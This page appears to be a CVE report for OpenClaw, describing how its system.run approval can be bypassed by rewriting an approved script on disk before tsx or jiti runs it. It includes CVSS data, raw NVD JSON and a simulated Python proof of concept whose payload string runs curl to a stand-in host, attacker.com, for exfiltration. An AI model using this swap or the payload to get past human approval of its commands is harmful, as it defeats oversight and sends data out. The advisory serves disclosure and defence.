Security Vulnerability Report
CVE-2026-32978 CVSS 8.0 HIGH

CVE-2026-32978

Published: 2026-03-29 13:17:02
Last Modified: 2026-03-30 17:15:44

Description

OpenClaw before 2026.3.11 contains an approval integrity vulnerability where system.run approvals fail to bind mutable file operands for certain script runners like tsx and jiti. Attackers can obtain approval for benign script commands, rewrite referenced scripts on disk, and execute modified code under the approved run context.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-32978: OpenClaw Approval Integrity Vulnerability

Description:
Demonstrates the race condition where a script is approved benignly but
replaced with malicious code before execution in runners like tsx/jiti.

Note: this is a simulation of the approval/execution sequence. It only writes
and rewrites a file on disk and prints each step; it does not invoke tsx, jiti
or OpenClaw itself.
"""


def simulate_openclaw_approval_bypass():
    # 1. Attacker creates a benign script
    benign_script = "console.log('Hello World');"
    script_path = "/tmp/benign_script.ts"
    with open(script_path, "w") as f:
        f.write(benign_script)
    print(f"[+] Created benign script at {script_path}")

    # 2. Attacker requests approval for system.run("tsx /tmp/benign_script.ts")
    # Assume the system checks the file content at this moment and approves it.
    print("[*] Requesting approval for system.run command...")
    # simulate_approval_check(script_path) -> returns True

    # 3. Time window: before execution, attacker swaps the file content.
    # The approval was bound to the command string, not to the file contents.
    malicious_script = "require('child_process').exec('curl attacker.com/exfil');"
    print("[!] Swapping script content with malicious code...")
    with open(script_path, "w") as f:
        f.write(malicious_script)

    # 4. System executes the approved command
    print("[*] System executes the approved command...")
    # In a vulnerable OpenClaw version, 'tsx' reads the current file content,
    # which is now malicious, executing it within the approved context.
    print("[+] Malicious code executed with approved privileges.")


if __name__ == "__main__":
    simulate_openclaw_approval_bypass()
```

References

https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53 (Vendor Advisory, Mitigation)
https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32978", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:01.963", "lastModified": "2026-03-30T17:15:43.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.11 contains an approval integrity vulnerability where system.run approvals fail to bind mutable file operands for certain script runners like tsx and jiti. Attackers can obtain approval for benign script commands, rewrite referenced scripts on disk, and execute modified code under the approved run context."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.11 contiene una vulnerabilidad de integridad de aprobación donde las aprobaciones de system.run no logran vincular operandos de archivo mutables para ciertos ejecutores de scripts como tsx y jiti. Los atacantes pueden obtener aprobación para comandos de script benignos, reescribir scripts referenciados en disco y ejecutar código modificado bajo el contexto de ejecución aprobado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.11", "matchCriteriaId": "4B01F0B5-B0CB-462E-A546-2BA2CACD83D5"}]}]}], "references": [{"url": 
"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}